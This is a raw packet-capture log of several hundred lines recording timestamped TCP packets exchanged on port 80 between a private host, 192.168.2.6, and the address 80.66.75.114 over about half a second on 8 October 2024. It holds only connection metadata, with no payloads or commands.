                                                Oct 8, 2024 04:24:39.606863976 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606868029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606885910 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606909037 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606910944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606924057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606930971 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606950045 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606956005 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606972933 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606978893 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606992960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607000113 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607018948 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607024908 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607028008 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607047081 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607067108 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607088089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607088089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607095003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607110023 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607116938 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607136011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607137918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607156038 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607167959 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607181072 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607189894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607208967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607209921 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607230902 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607230902 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607245922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607266903 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607280970 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607287884 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607309103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607310057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607323885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607335091 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607342958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607352018 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607374907 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607374907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607397079 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607409954 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607418060 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607449055 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607470036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607487917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607510090 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607512951 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607523918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607531071 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607541084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607552052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607563019 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607573032 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607594967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607594967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607615948 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607615948 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607629061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607656956 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703586102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703618050 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703634024 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703672886 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703681946 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703687906 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703704119 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703716040 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703727007 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703747034 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703747034 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703768969 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703788996 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703797102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703828096 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703849077 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703864098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703865051 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703886032 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703886032 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703907013 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703916073 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703924894 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797048092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797049999 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797068119 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797072887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797081947 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797096968 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797108889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797115088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797138929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797139883 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797151089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797159910 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797179937 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797188997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797199011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797208071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797224998 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797231913 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797245979 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797252893 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797266006 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797274113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797291994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797302008 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797310114 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797319889 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797343016 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797343969 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797364950 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797369957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797386885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797390938 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797419071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797429085 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797441959 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797455072 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797462940 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797481060 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797485113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797497988 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797507048 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797522068 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797525883 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797538042 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797563076 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797564983 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797585964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797589064 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797605038 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797612906 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797629118 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797629118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797647953 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797652960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797662020 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797676086 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797704935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797715902 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797720909 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797740936 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797751904 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797754049 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797780991 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797790051 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797806978 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797821999 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797856092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797859907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797871113 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797882080 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797897100 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797898054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797918081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797919989 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797930002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797946930 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797966003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.797987938 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.797992945 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798011065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798017025 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798029900 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798037052 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798059940 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798072100 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798080921 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798089027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798101902 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798104048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798122883 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798124075 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798137903 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798142910 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798155069 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798166037 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798177004 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798187017 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798202991 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798207998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798221111 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798228025 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798243046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798252106 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798260927 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798266888 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798283100 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798290014 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798306942 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798310041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798330069 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798331976 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.798352003 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.798376083 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885314941 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885339022 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885364056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885394096 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885413885 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885433912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885459900 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885482073 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885499954 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885529041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885529041 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885549068 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885569096 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885586977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885607958 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885704994 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885750055 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885770082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885771036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885771036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885771036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885771036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885771036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885771036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885842085 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885863066 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885883093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885901928 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.885977030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885977030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.885977030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.886837006 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.886920929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.886949062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.886960030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.886971951 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.886991978 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887010098 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887023926 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887022972 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887043953 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887070894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887082100 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887104034 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887110949 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887130976 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887165070 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887171984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887316942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887336969 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887353897 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887370110 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887435913 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887453079 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887475014 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887491941 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887506008 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887691021 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887731075 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887758970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887778997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887795925 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887814999 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887814999 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887836933 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887856960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887875080 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887885094 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887898922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887908936 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887923002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887927055 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887942076 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887948036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887964010 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887970924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.887984991 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.887998104 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888005972 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888015985 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888034105 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888048887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888052940 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888070107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888086081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888092041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888104916 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888124943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888128996 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888154030 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888163090 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888171911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888190031 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888202906 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888210058 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888222933 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888242960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888261080 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888262033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888283968 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888284922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888303995 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888309002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888326883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888328075 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888343096 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888349056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888355970 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888381004 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888395071 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888408899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888418913 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888431072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888448954 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888468027 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888468027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888492107 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888495922 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888515949 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888516903 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888530016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888545036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888552904 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888565063 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888583899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888600111 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888605118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888627052 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888631105 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888652086 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.888653040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.888665915 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068135977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068173885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068182945 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068223953 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068232059 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068272114 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068279028 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068319082 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068321943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068361998 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068383932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068423986 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068429947 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:40.068464041 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:40.068470955 CEST804973880.66.75.114192.168.2.6
